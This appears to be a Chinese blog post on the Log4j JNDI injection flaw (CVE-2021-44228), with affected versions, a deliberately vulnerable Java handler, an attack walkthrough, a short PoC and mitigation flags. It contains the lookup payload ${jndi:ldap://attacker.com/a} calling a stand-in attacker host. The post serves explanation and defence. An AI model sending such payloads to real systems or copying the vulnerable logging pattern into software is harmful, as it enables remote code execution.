漏洞

影响范围

2.0 <= Apache log4j <= 2.14.1

利用

import org.apache.log4j.Logger;import java.io.*;
import java.sql.SQLException;
import java.util.*;public class VulnerableLog4jExampleHandler implements HttpHandler {static Logger log = Logger.getLogger(log4jExample.class.getName());/*** A simple HTTP endpoint that reads the request's User Agent and logs it back.* This is basically pseudo-code to explain the vulnerability, and not a full example.* @param he HTTP Request Object*/public void handle(HttpExchange he) throws IOException {string userAgent = he.getRequestHeader("user-agent");// This line triggers the RCE by logging the attacker-controlled HTTP User Agent header.// The attacker can set their User-Agent header to: ${jndi:ldap://attacker.com/a}log.info("Request User Agent:" + userAgent);String response = "<h1>Hello There, " + userAgent + "!</h1>";he.sendResponseHeaders(200, response.length());OutputStream os = he.getResponseBody();os.write(response.getBytes());os.close();}
}

Data from the User gets sent to the server (via any protocol),
The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server),
The log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via “Java Naming and Directory Interface” (JNDI),
This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process,
This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.

另一种方法：

import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;
public class Poc {private static final Logger log = LogManager.getLogger();public static void main(String[] args) {log.error("${jndi:rmi://127.0.0.1:1099/xxxx}");}
}

缓解方式

a、修改jvm参数 -Dlog4j2.formatMsgNoLookups=true
b、修改配置：log4j2.formatMsgNoLookups=True
c、系统环境变量 FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true

参考

https://arstechnica.com/information-technology/2021/12/minecraft-and-other-apps-face-serious-threat-from-new-code-execution-bug/
https://www.lunasec.io/docs/blog/log4j-zero-day/
https://mp.weixin.qq.com/s/WBbAthHY36qY0w9e4UUl4Q
https://github.com/welk1n/JNDI-Injection-Exploit
https://v2ex.com/t/821241

Apache Log4j 漏洞（JNDI注入 CVE-2021-44228）相关推荐

网安大事件丨Fortinet对Apache Log4j漏洞利用的全面复盘与防御
起底Apache Log4j漏洞: 如何出现.如何被利用与如何防御受影响平台: 任何使用Log4j2漏洞版本的应用程序和服务受影响用户: 任何使用Log4j的具备该漏洞版本的组织影响: 远程攻击 ...
Apache Log4j 远程代码注入漏洞
漏洞说明 2021年12月9日,Apache Log4j2 Java 日志模块存在远程命令执行漏洞可直接控制目标服务器问题,攻击者攻击难度极低.由于 Apache Log4j2 某些功能存在递归解析功 ...
apache log4j漏洞复现
文章目录 1. Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645) 利用条件利用 2. CVE-2019-17571 利用条件利用 3. apache lo ...
Apache log4j漏洞总结
目录 log4j简介工具链接漏洞复现 CVE-2017-5645(Log4j反序列化漏洞) 环境搭建漏洞原理影响版本漏洞复现 CVE-2021-44228(Log4j 2远程代码执行漏洞) ...
Apache Log4j 漏洞持续爆雷，还能安心玩论坛吗？
这一周,各家互联网公司的程序员朋友们,都快被一个叫 Apache Log4j的史诗级漏洞给搞疯了! 这个漏洞源于一个叫 Log4J2 的 Java 开源日志框架,它在用 Java 敲代码的码农群体里可 ...
Apache Log4j漏洞学习笔记
JNDI注入 LDAP 轻量级目录访问协议可以理解为是一种目录数据库,概念上类似于马云的中国黄页.城镇电话簿这种. 比较典型的应用场景:统一登录例如: 一个公司下有很多系统比如OA.VPN ...
RMI、JNDI、LDAP介绍+log4j漏洞分析
介绍本篇主要介绍java的RMI.JNDI.LDAP,在后面会详细分析log4j的jndi注入原理. 什么是RMI RMI全称是Remote Method Invocatioon,也就是远程方法调用 ...
「屋漏偏逢连夜雨」，Log4j 漏洞还没忙完，新的又来了
整理 | 郑丽媛.禾木木出品 | CSDN 这几天,Apache Log4j 2 绝对是众多 Java 程序员提到的高频词之一:由于 Apache Log4j 2 引发的严重安全漏洞,令一大批安全人 ...
Apache Log4j2远程JNDI代码执行漏洞修复
#漏洞简介 Apache Log4j2远程代码执行漏洞当打印的日志含有${字符串时程序会使用lookup解析要打印的字符串,执行任意远程代码,框架没有做相应的过滤导致注入.官网已经在2.16.0(j ...

Apache Log4j 漏洞（JNDI注入 CVE-2021-44228）

漏洞

影响范围

利用

缓解方式

参考

Apache Log4j 漏洞（JNDI注入 CVE-2021-44228）相关推荐

最新文章

热门文章